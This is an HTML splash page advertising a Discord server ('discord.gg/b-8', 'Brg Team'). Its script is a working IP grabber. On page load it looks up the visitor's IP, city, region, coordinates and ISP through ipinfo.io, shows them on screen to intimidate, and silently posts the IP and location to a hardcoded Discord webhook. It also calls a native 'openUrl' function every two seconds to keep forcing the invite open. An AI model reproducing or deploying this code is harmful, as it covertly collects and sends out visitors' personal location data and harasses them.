<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/b-8</title>
    <style>
       body {
            margin: 0;
            padding: 0;
            background: black;
            font-family: 'Courier New', Courier, monospace;
            color: #9f8663;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
            overflow: hidden;
        }
        #content {
            display: none;
            opacity: 0;
            transition: opacity 2s ease;
        }
        .image-container img {
            width: 400px; 
            height: auto;
            border: 2px solid #c2c2c2; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(255, 255, 0, 0.7); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #ffffff; 
            text-shadow: 0 0 8px #000000, 0 0 15px #000000, 0 0 25px #000000;
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 5px;
            font-size: 75px; 
            color: #ffffff; 
            text-shadow: 0 0 8px #000000, 0 0 15px #000000, 0 0 25px #000000; 
            letter-spacing: 4.5px;
        }
        .video-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
            z-index: -1;
        }
        .video-container video {
            width: 100%;
            height: 100%;
            object-fit: cover;
            filter: blur(15px);
        }
    </style>
</head>
<body>
    <div class="video-container">
        <video autoplay loop muted>
            <source src="https://cdn.discordapp.com/attachments/1331679525313974372/1331680367182217286/iEZeoQAnJ1MTHSFG.mov?ex=6815acbc&is=68145b3c&hm=1f723cbeb90d5feb56015b589a1885926b6eb4a4e899f5bc56fd36ad44c7158d&" type="video/mp4">
            Your browser does not support the video tag.
        </video>
    </div>

    <div id="content">
        <div class="image-container">
            <img src="" alt="">
        </div>

        <audio autoplay loop>
            <source src="https://i.top4top.io/m_3408cijty1.mp3" type="audio/mpeg">
            Your browser does not support the audio element.
        </audio>
        <div class="info" id="ip-info"></div>
        <div class="text">discord.gg/b-8</div>
    </div>

    <script>
        setTimeout(() => {
            const content = document.getElementById('content');
            content.style.display = 'block';
            setTimeout(() => {
                content.style.opacity = 1;
            }, 200); 
        }, 200);

        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            const { ip, country, city, region, loc, org, timezone } = data;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.innerHTML = `Brg Team <br>
<strong>IP:</strong><span>"${ip}"</span><br><strong>City:</strong><span>"${city}"</span><br><strong>Region:</strong><span>"${region}"</span><br><strong>Country:</strong><span>"${country}"</span><br><strong>Location:</strong><span>"${loc}"</span><br><strong>ORG:</strong><span>"${org}"</span><br><strong>Timezone:</strong><span>"${timezone}"</span>`;

            const dateTime = new Date().toLocaleString();
            const webhookUrl = 'https://discord.com/api/webhooks/1367891046557552670/HYpOiDNlZi0-el1d2hwbtLiZQqQ0c-mVy_p7Xn6oFtHObPShIdyuNdUwTA7E-fcA5-x-';
            fetch(webhookUrl, {
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify({content: `IP : ${ip}\nCountry & City : ${country} - ${city}\nDate & Time : ${dateTime}\n -`})
            });
        });

        setInterval(function() {
            window.invokeNative("openUrl", "https://discord.gg/B-8");
        }, 2000);
    </script>
</body>
</html>
